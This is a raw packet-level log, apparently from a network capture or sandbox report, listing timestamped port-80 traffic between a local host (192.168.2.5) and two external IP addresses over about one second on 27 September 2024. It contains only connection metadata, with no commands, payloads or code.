Sep 27, 2024 04:21:15.929693937 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.933749914 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.933784962 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.933795929 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.933808088 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.933809042 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.933826923 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.933835983 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.933842897 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.933856964 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.933867931 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.933871984 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.933881044 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.933891058 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.933929920 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.934043884 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.934063911 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.934076071 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.934103012 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.934113979 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.934123993 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.934124947 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.934138060 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.934156895 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.934164047 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.934169054 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.934180975 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.934185982 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.934216976 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.934242964 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.934842110 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.934897900 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.934904099 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.934910059 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.934942007 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.934947968 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.934962034 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.934973955 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.934987068 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.934990883 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.934992075 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.934998035 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.935010910 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.935013056 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.935035944 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.935049057 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.935060978 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.935060978 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.935106039 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.935134888 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.935151100 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.935163021 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.935173035 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.935184002 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.935187101 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.935198069 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.935218096 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.935247898 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.935250044 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.935261011 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.935272932 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.935281992 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.935292006 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.935295105 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.935303926 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.935332060 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.935333014 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.935343981 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.935353041 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.935364962 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.935375929 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.935376883 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.935416937 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.935436964 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.935441971 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.935455084 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.935480118 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.935489893 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.935494900 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.935503006 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.935520887 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.935549021 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.935579062 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.935591936 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.935602903 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.935631990 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.935657978 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.935664892 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.935677052 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.935688019 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.935699940 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.935712099 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.935715914 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.935751915 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.935781002 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.935791969 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.935802937 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.935847044 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.935851097 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.935851097 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.935858965 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.935870886 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.935882092 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.935884953 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.935913086 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.935916901 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.935929060 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.935944080 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.935977936 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.936038017 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.936048985 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.936059952 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.936086893 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.936110973 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.936120987 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.936132908 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.936144114 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.936155081 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.936192989 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.936217070 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.936218023 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.936229944 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.936256886 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.936266899 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.936269045 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.936280966 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.936290026 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.936294079 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.936319113 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.936323881 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.936338902 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.936343908 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.936362982 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.936398029 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.951117992 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.951148987 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.951159954 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.951174021 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.951184988 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.951203108 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.951220989 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.951231956 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.951231003 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.951231003 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.951244116 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.951255083 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.951265097 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.951268911 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.951277018 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.951289892 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.951301098 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.951313972 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.951334000 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.951338053 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.951356888 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.951365948 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.951426029 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.967698097 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.967721939 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.967732906 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.967742920 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.967755079 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.967765093 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.967783928 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.967783928 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.967784882 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.967936039 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.968991041 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.969014883 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.969026089 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.969058037 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.969058037 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.969095945 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.969106913 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.969118118 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.969127893 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.969163895 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.969163895 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.973839045 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.973855972 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.973881960 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.973893881 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.973902941 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.973905087 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.973917007 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.973918915 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.973931074 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.973941088 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.973957062 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.973957062 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.973974943 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.974139929 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.974200964 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.974272013 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.974282980 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.974299908 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.974311113 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.974320889 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.974344969 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.974344969 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.974365950 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.974495888 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.974507093 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.974752903 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.974782944 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.974795103 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.974822998 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.974833965 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.974845886 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.974858046 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.974858046 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.974904060 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.975032091 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.975048065 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.975087881 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.975087881 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.975250959 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.975279093 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.975289106 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.975317955 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.975317955 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.975378990 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.975421906 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.975430012 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.975440979 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.975480080 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.975480080 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.975492954 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.975496054 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.975543976 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.975543976 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.975712061 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.975723028 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.975739956 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.975749969 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.975766897 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.975775957 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.975816011 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.975816011 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.975830078 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.975841999 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.975858927 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.975884914 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.975884914 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.975946903 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.976284981 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.976314068 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.976326942 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.976353884 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.976353884 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.976371050 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.976372957 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.976385117 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.976397038 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.976437092 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.976437092 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.976453066 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.976469040 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.976485014 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.976495028 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.976505995 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.976538897 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.976538897 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.976608992 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.976651907 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.976663113 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.976672888 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.976689100 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.976700068 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.976710081 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.976720095 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.976720095 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.976722956 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.976736069 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.976747036 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.976757050 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.976767063 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.976779938 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.976779938 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.976809025 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.976809025 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.977041960 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.977144957 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.978230000 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.978249073 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.978260994 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.978271008 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.978281021 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.978292942 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.978296041 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.978296041 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.978305101 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.978319883 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.978324890 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.978332996 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.978344917 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.978357077 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.978357077 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.978385925 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.978394032 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.978405952 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.978406906 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.978444099 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.978466988 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.978467941 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.978508949 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.991381884 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.991406918 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.991426945 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.991444111 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.991455078 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.991460085 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.991466999 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.991482019 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.991494894 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.991499901 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.991504908 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.991522074 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.991542101 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.991560936 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.001949072 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.001975060 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.001987934 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.001997948 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.002010107 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.002010107 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.002010107 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.002022028 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.002028942 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.002036095 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.002049923 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.002078056 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.002078056 CEST	49725	80	192.168.2.5	185.215.113.117
